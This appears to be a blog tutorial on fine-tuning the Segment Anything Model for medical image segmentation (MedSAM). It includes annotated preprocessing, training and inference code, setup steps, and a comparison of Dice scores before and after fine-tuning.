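For a feel of what box mode looks like in practice, here is a minimal sketch using the official segment-anything package; the image variable and the box coordinates are placeholders, and the checkpoint path just follows the layout used later in this post:

import numpy as np
from segment_anything import sam_model_registry, SamPredictor

sam = sam_model_registry["vit_b"](checkpoint="work_dir/SAM/sam_vit_b_01ec64.pth")
predictor = SamPredictor(sam)
predictor.set_image(image)  # image: an HxWx3 uint8 RGB numpy array (placeholder)
masks, scores, _ = predictor.predict(
    point_coords=None,
    box=np.array([100, 80, 220, 190]),  # XYXY pixel coordinates (placeholder box)
    multimask_output=False,  # one mask; True would return three candidates with scores
)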


To adapt SAM to medical image segmentation, it is necessary to choose appropriate user prompts and decide which network components to fine-tune.

Based on the analysis above, bounding-box prompts are the right choice for specifying the segmentation target. SAM's network architecture has three main components: the **image encoder**, the **prompt encoder**, and the **mask decoder**. Any combination of them could be fine-tuned; the choices here are (see the sketch after this list):

• The image encoder is a vision transformer, the most computationally expensive part of SAM. To reduce cost, the image encoder is frozen.

• The prompt encoder encodes the box's positional information and can be reused from SAM's pretrained box encoder, so it is frozen as well.

• Only the mask decoder is fine-tuned.
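A minimal PyTorch sketch of this freezing scheme, assuming a sam_model loaded as in the tutorial code below; note the notebook itself freezes the encoders implicitly instead, by giving the optimizer only the mask-decoder parameters and running the encoders under torch.no_grad():

import torch

# freeze image encoder and prompt encoder explicitly
for p in sam_model.image_encoder.parameters():
    p.requires_grad_(False)
for p in sam_model.prompt_encoder.parameters():
    p.requires_grad_(False)
# fine-tune only the mask decoder
optimizer = torch.optim.Adam(sam_model.mask_decoder.parameters(), lr=1e-5)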

    png

Because the image encoder runs before any prompting, the image embeddings of all training images can be precomputed once, avoiding repeated embedding computation for every prompt and greatly improving training efficiency (this is exactly what the preprocessing scripts below do). The mask decoder also only needs to produce one mask rather than three, since in most cases a box prompt specifies the intended target unambiguously.


Each dataset is randomly split 80%/20% for training and testing. Segmentation targets smaller than 100 pixels are excluded. Since SAM is designed for 2D image segmentation, 3D images (CT, MR, PET) are sliced into 2D along the out-of-plane dimension. The pretrained ViT-Base model serves as the image encoder, and all image embeddings are computed offline by feeding the normalized images through it (the encoder resizes inputs to $3\times 1024\times 1024$). During training, bounding-box prompts are generated from the ground-truth masks with random perturbations of 0-20 pixels. The loss is the unweighted sum of Dice loss and cross-entropy loss, which has proven robust across segmentation tasks. The network is optimized with Adam at an initial learning rate of 1e-5.


The Dice similarity coefficient (DSC) and normalized surface distance (NSD, 1 mm tolerance), two commonly used segmentation metrics, evaluate the region overlap and boundary consistency between the ground truth and the segmentation result.

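For reference, DSC on binary masks is simply twice the intersection divided by the total mask volume; a minimal numpy sketch of my own (not the paper's code):

import numpy as np

def dice_coefficient(mask_gt: np.ndarray, mask_pred: np.ndarray) -> float:
    # DSC = 2 * |A ∩ B| / (|A| + |B|) for boolean masks
    volume_sum = mask_gt.sum() + mask_pred.sum()
    if volume_sum == 0:
        return float('nan')  # both masks empty: DSC undefined
    return 2.0 * np.logical_and(mask_gt, mask_pred).sum() / volume_sum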

The code and trained models are public, together with a step-by-step tutorial on fine-tuning SAM on a customized new dataset. The authors look forward to advancing this exciting research area with the community.

Code

Setup

Create a new conda environment:

conda create -n medsam python=3.10 -y

Activate it:

conda activate medsam

Install PyTorch offline:

From download.pytorch.org/whl/torch_stable.html download the matching torch and torchvision wheels:

• torch-2.0.0+cu117-cp310-cp310-win_amd64.whl
• torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl

png

Install them:

pip install torch-2.0.0+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

Clone the repository: bowang-lab/MedSAM, the official repository for MedSAM: Segment Anything in Medical Images (github.com).

In the repository folder:

pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple

Fine-tuning SAM on a custom dataset

1. Open pre_CT.py and see what the parser defines:
    # set up the parser
    parser = argparse.ArgumentParser(description='preprocess CT images')
    parser.add_argument('-i', '--nii_path', type=str, default='data/FLARE22Train/images', help='path to the nii images')
    parser.add_argument('-gt', '--gt_path', type=str, default='data/FLARE22Train/labels', help='path to the ground truth',)
    parser.add_argument('-o', '--npz_path', type=str, default='data/Npz_files', help='path to save the npz files')

    parser.add_argument('--image_size', type=int, default=256, help='image size')
    parser.add_argument('--modality', type=str, default='CT', help='modality')
    parser.add_argument('--anatomy', type=str, default='Abd-Gallbladder', help='anatomy')
    parser.add_argument('--img_name_suffix', type=str, default='_0000.nii.gz', help='image name suffix')
    parser.add_argument('--label_id', type=int, default=9, help='label id')
    parser.add_argument('--prefix', type=str, default='CT_Abd-Gallbladder_', help='prefix')
    parser.add_argument('--model_type', type=str, default='vit_b', help='model type')
    parser.add_argument('--checkpoint', type=str, default='work_dir/SAM/sam_vit_b_01ec64.pth', help='checkpoint')
    parser.add_argument('--device', type=str, default='cuda:0', help='device')
    # seed
    parser.add_argument('--seed', type=int, default=2023, help='random seed')
    args = parser.parse_args()
| name | flag | type | default | help |
| --- | --- | --- | --- | --- |
| --nii_path | -i | str | 'data/FLARE22Train/images' | path to the nii images |
| --gt_path | -gt | str | 'data/FLARE22Train/labels' | path to the ground truth |
| --npz_path | -o | str | 'data/Npz_files' | path to save the npz files |
| --image_size | | int | 256 | image size |
| --modality | | str | 'CT' | modality |
| --anatomy | | str | 'Abd-Gallbladder' | anatomy |
| --img_name_suffix | | str | '_0000.nii.gz' | image name suffix |
| --label_id | | int | 9 | label id |
| --prefix | | str | 'CT_Abd-Gallbladder_' | prefix |
| --model_type | | str | 'vit_b' | model type |
| --checkpoint | | str | 'work_dir/SAM/sam_vit_b_01ec64.pth' | checkpoint |
| --device | | str | 'cuda:0' | device |
| --seed | | int | 2023 | random seed |
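Putting the table together, a typical invocation (illustrative; the values are just the defaults spelled out) looks like:

python pre_CT.py -i data/FLARE22Train/images -gt data/FLARE22Train/labels -o data/Npz_files --label_id 9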
2. Download sam_vit_b_01ec64.pth and place it under work_dir/SAM/:

    png

    3D

1. Download FLARE22Train.zip, extract it, and place it under data/:

    png

The dataset contains 50 abdominal CT scans, each with an annotation mask covering 13 organs. The organ label names can be found at MICCAI FLARE2022. In this tutorial, we fine-tune SAM for gallbladder segmentation.

nii.gz is a common medical imaging format: a compressed file based on NIfTI (Neuroimaging Informatics Technology Initiative), typically used to store head and body MRI and CT data. It holds the 3D volume plus image-related metadata such as resolution and acquisition parameters, and can be read, edited, and processed by tools like FSL, SPM, and ANTs.
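In Python such volumes are commonly read with nibabel (my choice for illustration; the preprocessing script may use a different reader, and the file name below is made up):

import nibabel as nib

img = nib.load('data/FLARE22Train/images/FLARE22_Tr_0001_0000.nii.gz')  # illustrative path
vol = img.get_fdata()            # the 3D volume as a numpy array
print(vol.shape)                 # e.g. (512, 512, num_slices)
print(img.header.get_zooms())    # voxel spacing in mm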

2. Run pre_CT.py. This is just preprocessing! It:

  • Splits the dataset: 80% for training, 20% for testing

  • Normalizes the images

  • Precomputes the image embeddings

  • Saves the normalized images (imgs), ground-truth masks (gts), and image embeddings (img_embeddings) together into .npz files

An npy file is numpy's binary format for a single array; the array's shape, dtype, and other metadata are stored in the file. npy files are read and written with numpy's load() and save() functions.

Compared with text-based data files like txt and csv, npy offers better performance and reliability. Text data must be converted to and parsed from strings, which is slow at scale, and parsing can break across different systems and software. npy stores the in-memory binary array directly, with no string conversion, so it is faster and free of such parsing errors.

npz is numpy's format for bundling arrays: a compressed file that packs several numpy arrays together with a good compression ratio. np.savez_compressed() writes a .npz file, and np.load() reads the arrays back. Compared with formats like .txt and .csv, .npz is more convenient for storing and loading large array datasets, since it uses numpy's efficient I/O, and it is easy to share array datasets without hand-writing IO code.
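The round trip, for the record:

import numpy as np

a = np.arange(6).reshape(2, 3)
np.save('single.npy', a)                          # one array per .npy file
np.savez_compressed('bundle.npz', imgs=a, gts=a)  # several named arrays per .npz
data = np.load('bundle.npz')
print(data['imgs'].shape)                         # (2, 3)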

    png

3. Then you can run finetune_and_inference_tutorial_3D_dataset.ipynb.

    2D

1. Download the 2D dataset MedSAMDemo_2D.zip from Google Drive and place it under data/:

    png

    png

    png

2. Run pre_grey_rgb2D.py. Again, this is just preprocessing! Luckily it doesn't take long, so I ran it directly on my laptop.

    png

3. This produces data\demo2D_vit_b\demo2d.npz! Then you can run finetune_and_inference_tutorial_2D_dataset.ipynb.

    png

Hit two more pitfalls; patch, patch, patch:

    pip install chardet
    pip install --force-reinstall charset-normalizer==3.1.0

Now it runs!

    png

Reading the code

pre_grey_rgb2D.py

This script mainly preprocesses the dataset.

    set up the parser

| name | type | default | help |
| --- | --- | --- | --- |
| -i, --img_path | str | data/MedSAMDemo_2D/train/images | path to the images |
| -gt, --gt_path | str | data/MedSAMDemo_2D/train/labels | path to the ground truth (gt) |
| -o, --npz_path | str | data/demo2D | path to save the npz files |
| --data_name | str | demo2d | dataset name; used to name the final npz file, e.g., demo2d.npz |
| --image_size | int | 256 | image size |
| --img_name_suffix | str | .png | image name suffix |
| --label_id | int | 255 | label id |
| --model_type | str | vit_b | model type |
| --checkpoint | str | work_dir/SAM/sam_vit_b_01ec64.pth | checkpoint |
| --device | str | cuda:0 | device |
| --seed | int | 2023 | random seed |
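An illustrative invocation with the defaults from the table:

python pre_grey_rgb2D.py -i data/MedSAMDemo_2D/train/images -gt data/MedSAMDemo_2D/train/labels -o data/demo2D --data_name demo2d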
# list all file names under args.gt_path, sorted lexicographically
names = sorted(os.listdir(args.gt_path))
# join args.npz_path and args.model_type into the output path save_path
save_path = args.npz_path + '_' + args.model_type
# create save_path (and any missing parents); do nothing if it already exists
os.makedirs(save_path, exist_ok=True)
# print the number of images, i.e. len(names)
print('image number:', len(names))

    set up the model

# initialize the model from args.model_type, args.checkpoint, args.device
sam_model = sam_model_registry[args.model_type](checkpoint=args.checkpoint).to(args.device)

    convert 2d grey or rgb images to npz file

imgs = []            # images
gts = []             # labels
img_embeddings = []  # image embeddings

# iterate over the ground-truth folder; names is the sorted file list of args.gt_path
# (default 'data/MedSAMDemo_2D/train/labels')
for gt_name in tqdm(names):
    image_name = gt_name.split('.')[0] + args.img_name_suffix  # image file name = stem + suffix
    gt_data = io.imread(join(args.gt_path, gt_name))  # load the ground truth
    if len(gt_data.shape) == 3:  # if gt has 3 dims, keep only the first channel (greyscale)
        gt_data = gt_data[:, :, 0]
    assert len(gt_data.shape) == 2, 'ground truth should be 2D'  # (height, width) only
    # Binarize and resize the label: pixels equal to args.label_id become 1, the rest 0,
    # then resize to args.image_size. order=0 means nearest-neighbour interpolation,
    # preserve_range=True keeps the value range, mode='constant' controls padding.
    # The result is a binary image containing only 0s and 1s.
    gt_data = transform.resize(gt_data == args.label_id, (args.image_size, args.image_size), order=0, preserve_range=True, mode='constant')
    gt_data = np.uint8(gt_data)  # cast to 8-bit unsigned int

    # exclude tiny objects: only keep samples whose mask has more than 100 pixels
    if np.sum(gt_data) > 100:
        # max is 1 and there are exactly two distinct values: the mask is binary
        assert np.max(gt_data) == 1 and np.unique(gt_data).shape[0] == 2, 'ground truth should be binary'
        image_data = io.imread(join(args.img_path, image_name))  # load the image
        # if the image has an alpha channel, keep only the first three (RGB) channels
        if image_data.shape[-1] > 3 and len(image_data.shape) == 3:
            image_data = image_data[:, :, :3]
        # if the image is single-channel, repeat it three times to get RGB
        if len(image_data.shape) == 2:
            image_data = np.repeat(image_data[:, :, None], 3, axis=-1)
        # nii preprocess start
        # intensity cut-off: take the 0.5th and 99.5th percentiles of the pixel values
        # as the lower and upper bounds for the later normalization
        lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
        # clip pixel values to [lower_bound, upper_bound]
        image_data_pre = np.clip(image_data, lower_bound, upper_bound)
        # min-max normalize to 0-255, so the image is independent of its intensity range;
        # many models expect normalized inputs
        image_data_pre = (image_data_pre - np.min(image_data_pre)) / (np.max(image_data_pre) - np.min(image_data_pre)) * 255.0
        # set background (black) pixels to 0
        image_data_pre[image_data == 0] = 0
        # resize with cubic interpolation (order=3) and anti-aliasing, keeping the value range
        image_data_pre = transform.resize(image_data_pre, (args.image_size, args.image_size), order=3, preserve_range=True, mode='constant', anti_aliasing=True)
        image_data_pre = np.uint8(image_data_pre)  # cast to 8-bit unsigned int

        imgs.append(image_data_pre)  # collect the preprocessed image
        # why check this again? it already held above; smells like legacy code
        assert np.sum(gt_data) > 100, 'ground truth should have more than 100 pixels'
        gts.append(gt_data)  # collect the preprocessed label
        # resize image to 3*1024*1024
        # ResizeLongestSide rescales images (apply_image) and coordinates (apply_coords)
        # so the longest side matches the encoder's input size
        sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
        resize_img = sam_transform.apply_image(image_data_pre)
        # numpy HWC -> torch CHW tensor on the GPU
        resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(args.device)
        # model preprocessing (e.g. mean/std normalization and padding)
        input_image = sam_model.preprocess(resize_img_tensor[None, :, :, :])  # (1, 3, 1024, 1024)
        assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'
        # pre-compute the image embedding with the frozen encoder
        with torch.no_grad():
            embedding = sam_model.image_encoder(input_image)
            img_embeddings.append(embedding.cpu().numpy()[0])

    save all 2D images as one npz file: ori_imgs, ori_gts, img_embeddings

    stack the list to array

# save all 2D images plus their ground truths and image embeddings into one npz file
if len(imgs) > 1:
    imgs = np.stack(imgs, axis=0)  # (n, 256, 256, 3): n RGB images of 256x256
    gts = np.stack(gts, axis=0)  # (n, 256, 256): n 256x256 binary masks
    img_embeddings = np.stack(img_embeddings, axis=0)  # (n, 256, 64, 64): one 256x64x64 embedding per image
    # save the three arrays into one npz file under the keywords imgs, gts, img_embeddings
    np.savez_compressed(join(save_path, args.data_name + '.npz'), imgs=imgs, gts=gts, img_embeddings=img_embeddings)
    # save an example image for sanity check: pick a random index
    idx = np.random.randint(imgs.shape[0])
    # take the image and ground truth at that index
    img_idx = imgs[idx, :, :, :]
    gt_idx = gts[idx, :, :]
    # find the boundary pixels of each object in gt_idx with scikit-image's find_boundaries
    bd = segmentation.find_boundaries(gt_idx, mode='inner')
    # paint the boundary red
    img_idx[bd, :] = [255, 0, 0]
    # save the overlaid image as a png for visual inspection
    io.imsave(save_path + '.png', img_idx, check_contrast=False)

    finetune_and_inference_tutorial_2D_dataset.ipynb

With the preprocessed dataset in hand, you can run finetune_and_inference_tutorial_2D_dataset.ipynb to fine-tune the SAM model.

    class NpzDataset(Dataset)

class NpzDataset(Dataset):
    def __init__(self, data_root):
        # read every .npz file under the given directory
        self.data_root = data_root
        self.npz_files = sorted(os.listdir(self.data_root))
        self.npz_data = [np.load(join(data_root, f)) for f in self.npz_files]
        # this implementation is ugly but it works (and is also fast for feeding data to
        # GPU) if your server has enough RAM; as an alternative, you can also use a list
        # of npy files and load them one by one
        # vstack merges the 'gts' and 'img_embeddings' fields of all files into two
        # numpy arrays: ori_gts and img_embeddings
        self.ori_gts = np.vstack([d['gts'] for d in self.npz_data])
        self.img_embeddings = np.vstack([d['img_embeddings'] for d in self.npz_data])
        # debug output: the shapes actually read from the data files
        print(f"{self.img_embeddings.shape=}, {self.ori_gts.shape=}")

    def __len__(self):
        # dataset size = number of samples; since __init__ merged the 'gts' fields of
        # all npz files into ori_gts, this is the first dimension of that array
        return self.ori_gts.shape[0]

    def __getitem__(self, index):
        # image embedding
        img_embed = self.img_embeddings[index]
        # ground truth
        gt2D = self.ori_gts[index]
        # bounding box derived from the mask
        y_indices, x_indices = np.where(gt2D > 0)
        x_min, x_max = np.min(x_indices), np.max(x_indices)
        y_min, y_max = np.min(y_indices), np.max(y_indices)
        # add perturbation to bounding box coordinates (data augmentation)
        H, W = gt2D.shape
        x_min = max(0, x_min - np.random.randint(0, 20))
        x_max = min(W, x_max + np.random.randint(0, 20))
        y_min = max(0, y_min - np.random.randint(0, 20))
        y_max = min(H, y_max + np.random.randint(0, 20))
        bboxes = np.array([x_min, y_min, x_max, y_max])
        # convert img embedding, mask, bounding box to torch tensors and return the
        # triple (image embedding, 2D ground-truth mask, box coordinates)
        return torch.tensor(img_embed).float(), torch.tensor(gt2D[None, :, :]).long(), torch.tensor(bboxes).float()

    test dataset class and dataloader

npz_tr_path = 'data/demo2D_vit_b'
# build an NpzDataset from npz_tr_path
demo_dataset = NpzDataset(npz_tr_path)
# before training, read one mini-batch to sanity-check the dataset and dataloader;
# batch_size=8 means each iteration yields 8 samples
demo_dataloader = DataLoader(demo_dataset, batch_size=8, shuffle=True)
for img_embed, gt2D, bboxes in demo_dataloader:
    # img_embed: (B, 256, 64, 64), gt2D: (B, 1, 256, 256), bboxes: (B, 4)
    # print the shapes of the first mini-batch to confirm they match expectations
    print(f"{img_embed.shape=}, {gt2D.shape=}, {bboxes.shape=}")
    # stop after the first mini-batch
    break

    set up model for fine-tuning

# train data path
npz_tr_path = 'data/demo2D_vit_b'  # training data
work_dir = './work_dir'  # working directory
task_name = 'demo2D'  # task name
# prepare SAM model
model_type = 'vit_b'  # model type
checkpoint = 'work_dir/SAM/sam_vit_b_01ec64.pth'  # pretrained weights
device = 'cuda:0'  # device
model_save_path = join(work_dir, task_name)  # where checkpoints are saved
os.makedirs(model_save_path, exist_ok=True)
sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)  # load the model
sam_model.train()  # training mode
# Set up the optimizer; hyperparameter tuning will improve performance here.
# Only the mask decoder's parameters are optimized; the encoders stay frozen.
optimizer = torch.optim.Adam(sam_model.mask_decoder.parameters(), lr=1e-5, weight_decay=0)
# Segmentation loss: a combination of DiceLoss (a measure of the deviation between
# predicted and true segmentation) and CrossEntropyLoss (per-pixel classification loss)
seg_loss = monai.losses.DiceCELoss(sigmoid=True, squared_pred=True, reduction='mean')

self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
img_embed.shape=torch.Size([8, 256, 64, 64]), gt2D.shape=torch.Size([8, 1, 256, 256]), bboxes.shape=torch.Size([8, 4])

    training

The original author used an NVIDIA RTX A5500 with 24 GB of VRAM; my RTX 4060 only has 8 GB, so I had to shrink the batch size. I set it to 8 (the DataLoader line below still shows the tutorial's 64). VRAM usage stayed around 2 GB throughout training, so it could probably go higher.

num_epochs = 100  # number of epochs
losses = []  # per-epoch loss values
best_loss = 1e10  # best loss so far
train_dataset = NpzDataset(npz_tr_path)  # load the training data
# dataloader: shuffled batches of 64 (I ran with batch_size=8; see above)
train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)
for epoch in range(num_epochs):
    epoch_loss = 0
    # train
    # step: current batch index
    # image_embedding: precomputed image features
    # gt2D: ground-truth masks; boxes: ground-truth 2D bounding boxes
    for step, (image_embedding, gt2D, boxes) in enumerate(tqdm(train_dataloader)):
        # do not compute gradients for image encoder and prompt encoder (kept frozen)
        with torch.no_grad():
            # convert box to 1024x1024 grid coordinates
            box_np = boxes.numpy()
            sam_trans = ResizeLongestSide(sam_model.image_encoder.img_size)
            box = sam_trans.apply_boxes(box_np, (gt2D.shape[-2], gt2D.shape[-1]))
            # to a pytorch tensor
            box_torch = torch.as_tensor(box, dtype=torch.float, device=device)
            if len(box_torch.shape) == 2:
                # If box_torch has shape (B, 4), where B is the batch size and 4 holds
                # the box coordinates (top-left and bottom-right points), expand it to
                # (B, 1, 4) so downstream shapes stay consistent and no dimension
                # mismatch occurs.
                box_torch = box_torch[:, None, :]  # (B, 1, 4)
            # get prompt embeddings
            sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
                points=None,  # no point prompts
                boxes=box_torch,  # box prompts provide the features
                masks=None,  # no mask prompts
            )
        # predicted masks: forward pass through the (trainable) mask decoder
        mask_predictions, _ = sam_model.mask_decoder(
            image_embeddings=image_embedding.to(device),  # (B, 256, 64, 64)
            image_pe=sam_model.prompt_encoder.get_dense_pe(),  # (1, 256, 64, 64)
            sparse_prompt_embeddings=sparse_embeddings,  # (B, 2, 256)
            dense_prompt_embeddings=dense_embeddings,  # (B, 256, 64, 64)
            multimask_output=False,
        )

        # compute the loss
        loss = seg_loss(mask_predictions, gt2D.to(device))
        # backpropagate
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        # accumulate the loss
        epoch_loss += loss.item()

    epoch_loss /= (step + 1)  # average over batches (step is zero-based)
    losses.append(epoch_loss)
    print(f'EPOCH: {epoch}, Loss: {epoch_loss}')
    # save the latest model checkpoint
    torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_latest.pth'))
    # save the best model
    if epoch_loss < best_loss:
        best_loss = epoch_loss
        torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_best.pth'))
    self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
    100%|██████████| 57/57 [00:09<00:00, 5.95it/s]
    EPOCH: 0, Loss: 0.2000392587589366
    ……
    100%|██████████| 57/57 [00:05<00:00, 11.29it/s]
    EPOCH: 99, Loss: 0.03958414628037384

    plot loss

plt.plot(losses)
plt.title('Dice + Cross Entropy Loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.savefig(join(model_save_path, 'train_loss.png'))  # save before show(), or the saved figure may be blank
plt.show()  # comment this line if you are running on a server
plt.close()

If I set PyCharm's theme to dark, the images matplotlib outputs turn dark as well…
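If that bothers you, my guess (untested) is that forcing matplotlib's default style, or pinning a white background at save time, should undo the IDE-injected dark theme:

import matplotlib.pyplot as plt

plt.style.use('default')  # drop any injected dark style
# or pin the background when saving:
# plt.savefig('train_loss.png', facecolor='white')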

    png

    load the original SAM model

from skimage import io
# load the original SAM model onto the GPU
ori_sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)
# build the predictor
ori_sam_predictor = SamPredictor(ori_sam_model)

# test data paths
ts_img_path = 'data/MedSAMDemo_2D/test/images'
ts_gt_path = 'data/MedSAMDemo_2D/test/labels'
test_names = sorted(os.listdir(ts_img_path))

# random select a test case
img_idx = np.random.randint(len(test_names))  # random index
image_data = io.imread(join(ts_img_path, test_names[img_idx]))  # read the image
if image_data.shape[-1] > 3 and len(image_data.shape) == 3:  # keep only 3 channels
    image_data = image_data[:, :, :3]
if len(image_data.shape) == 2:  # single-channel greyscale: repeat to 3 channels
    image_data = np.repeat(image_data[:, :, None], 3, axis=-1)

# read ground truth (gt should have the same name as the image) and simulate a bounding box
def get_bbox_from_mask(mask):
    '''Returns a (randomly perturbed) bounding box extracted from a mask.'''
    y_indices, x_indices = np.where(mask > 0)
    x_min, x_max = np.min(x_indices), np.max(x_indices)
    y_min, y_max = np.min(y_indices), np.max(y_indices)
    # add perturbation to bounding box coordinates
    H, W = mask.shape
    x_min = max(0, x_min - np.random.randint(0, 20))
    x_max = min(W, x_max + np.random.randint(0, 20))
    y_min = max(0, y_min - np.random.randint(0, 20))
    y_max = min(H, y_max + np.random.randint(0, 20))

    return np.array([x_min, y_min, x_max, y_max])

# get the ground truth and a simulated box prompt
gt_data = io.imread(join(ts_gt_path, test_names[img_idx]))
bbox_raw = get_bbox_from_mask(gt_data)

# preprocess: cut-off and max-min normalization (same as at training time)
lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
image_data_pre = np.clip(image_data, lower_bound, upper_bound)
# intensity cut-off plus min-max normalization to 0-255
image_data_pre = (image_data_pre - np.min(image_data_pre)) / (np.max(image_data_pre) - np.min(image_data_pre)) * 255.0
image_data_pre[image_data == 0] = 0
image_data_pre = np.uint8(image_data_pre)
H, W, _ = image_data_pre.shape

# predict the segmentation mask using the original SAM model
ori_sam_predictor.set_image(image_data_pre)
ori_sam_seg, _, _ = ori_sam_predictor.predict(point_coords=None, box=bbox_raw, multimask_output=False)

    predict the segmentation mask using the fine-tuned model

# resize image to 3*1024*1024 with ResizeLongestSide, as in preprocessing
sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
resize_img = sam_transform.apply_image(image_data_pre)
# to a PyTorch tensor on the GPU
resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(device)
input_image = sam_model.preprocess(resize_img_tensor[None, :, :, :])  # (1, 3, 1024, 1024)
assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'

with torch.no_grad():
    # pre-compute the image embedding with the image encoder
    ts_img_embedding = sam_model.image_encoder(input_image)
    # convert box to the 1024x1024 grid
    # (the notebook calls this via sam_trans, defined in the training cell; same transform)
    bbox = sam_transform.apply_boxes(bbox_raw, (H, W))
    print(f'{bbox_raw=} -> {bbox=}')
    box_torch = torch.as_tensor(bbox, dtype=torch.float, device=device)
    if len(box_torch.shape) == 2:
        box_torch = box_torch[:, None, :]  # (B, 4) -> (B, 1, 4)

    # compute the sparse and dense prompt embeddings with the prompt encoder
    sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
        points=None,
        boxes=box_torch,
        masks=None,
    )
    # decode a mask from the image and prompt embeddings
    medsam_seg_prob, _ = sam_model.mask_decoder(
        image_embeddings=ts_img_embedding.to(device),  # (B, 256, 64, 64)
        image_pe=sam_model.prompt_encoder.get_dense_pe(),  # (1, 256, 64, 64)
        sparse_prompt_embeddings=sparse_embeddings,  # (B, 2, 256)
        dense_prompt_embeddings=dense_embeddings,  # (B, 256, 64, 64)
        multimask_output=False,
    )
    medsam_seg_prob = torch.sigmoid(medsam_seg_prob)  # squash to [0, 1]
    # convert soft mask to hard mask
    medsam_seg_prob = medsam_seg_prob.cpu().numpy().squeeze()
    medsam_seg = (medsam_seg_prob > 0.5).astype(np.uint8)
    print(medsam_seg.shape)
    bbox_raw=array([164, 159, 189, 187], dtype=int64) -> bbox=array([[656, 636, 756, 748]], dtype=int64)
    (256, 256)

compute accuracy

Which shows this whole exercise really does pay off!

    ori_sam_dsc = compute_dice_coefficient(gt_data>0, ori_sam_seg>0)
    medsam_dsc = compute_dice_coefficient(gt_data>0, medsam_seg>0)
    print('Original SAM DSC: {:.4f}'.format(ori_sam_dsc), 'MedSAM DSC: {:.4f}'.format(medsam_dsc))
    Original SAM DSC: 0.7397 MedSAM DSC: 0.9145

    visualization functions

# visualization functions
# source: https://github.com/facebookresearch/segment-anything/blob/main/notebooks/predictor_example.ipynb
# change color to avoid red and green
def show_mask(mask, ax, random_color=False):
    if random_color:
        color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)
    else:
        color = np.array([251/255, 252/255, 30/255, 0.6])
    h, w = mask.shape[-2:]
    mask_image = mask.reshape(h, w, 1) * color.reshape(1, 1, -1)
    ax.imshow(mask_image)

def show_box(box, ax):
    x0, y0 = box[0], box[1]
    w, h = box[2] - box[0], box[3] - box[1]
    ax.add_patch(plt.Rectangle((x0, y0), w, h, edgecolor='blue', facecolor=(0,0,0,0), lw=2))

_, axs = plt.subplots(1, 3, figsize=(25, 25))
axs[0].imshow(image_data)
show_mask(gt_data > 0, axs[0])
# show_box(box_np[img_id], axs[0])
# axs[0].set_title('Mask with Tuned Model', fontsize=20)
axs[0].axis('off')

axs[1].imshow(image_data)
show_mask(ori_sam_seg, axs[1])
show_box(bbox_raw, axs[1])
# add text to image to show dice score
axs[1].text(0.5, 0.5, 'SAM DSC: {:.4f}'.format(ori_sam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
# axs[1].set_title('Mask with Untuned Model', fontsize=20)
axs[1].axis('off')

axs[2].imshow(image_data)
show_mask(medsam_seg, axs[2])
show_box(bbox_raw, axs[2])
# add text to image to show dice score
axs[2].text(0.5, 0.5, 'MedSAM DSC: {:.4f}'.format(medsam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
# axs[2].set_title('Ground Truth', fontsize=20)
axs[2].axis('off')
plt.show()
plt.subplots_adjust(wspace=0.01, hspace=0)
# save plot
# plt.savefig(join(model_save_path, test_npzs[npz_idx].split('.npz')[0] + str(img_id).zfill(3) + '.png'), bbox_inches='tight', dpi=300)
plt.close()

    png

    ]]>
    + 资源

    笔记

    • SAM 真是太牛逼啦!但是它在医学图像上的性能十分有限。

    • 介绍了 MedSAM

      • 设计了一个大规模的医学图像数据集,包含 11 种模式,20 多万个蒙版。提供了关于在定制的新数据集上微调 SAM 的分步教程

      • 开发了一种简单的微调方法(simple fine-tuning method),将 SAM 用于普通医学图像分割。在 21 个 3D 分割任务和 9 个 2D 任务中,比默认 SAM 要好使。


    ​ 第一个也是最著名的**基础分割模型(segmentation foundation model)**是 SAM,它在超过 1B 个蒙版上进行训练,可以根据提示(例如,边界框、点、文本)或以全自动的方式生成准确的对象蒙版。但是自然图像和医学图像之前存在显著差异,这些模型在医学图像分割中的适用性仍然有限,在一些典型的医学图像分割任务(对象边缘信息较弱)中不好使。


    ​ SAM 利用了基于 transformer 的架构:

    • 使用 transformer-based 的**图像编码器(image encoder)**提取图像特征

      • pretrained with masked auto-encoder modeling,可以处理高分辨率图像(即 $1024\times 1024$),获得的图像嵌入是 $16\times \mathrm{downscaled}(64\times 64)$
    • 使用**提示编码器(prompt encoder)**结合用户交互

      • 支持四种不同的提示
        • 点:通过傅里叶位置编码和两个可学习的标记进行编码,分别用于指定前景和背景
        • 边界框:通过其左上角的点和右下角的点进行编码
        • 文本:由 CLIP 中经过预训练的文本编码器进行编码
        • 掩码:与输入图像具有相同的分辨率,输入图像由卷积特征图编码
    • 使用**掩码解码器(mask encoder)**来基于图像嵌入、提示嵌入和输出令牌生成分割结果和置信度得分。

      • 采用了轻量级设计,由两个转换器层组成,具有动态蒙版预测头和两个交集(Intersection-over-Union,IOU)分数回归头。

    ​ 蒙版预测头可以生成 3 个 $4\times \mathrm{downscaled\ masks}$,分别对应于整个对象、部分对象和子对象。

    png


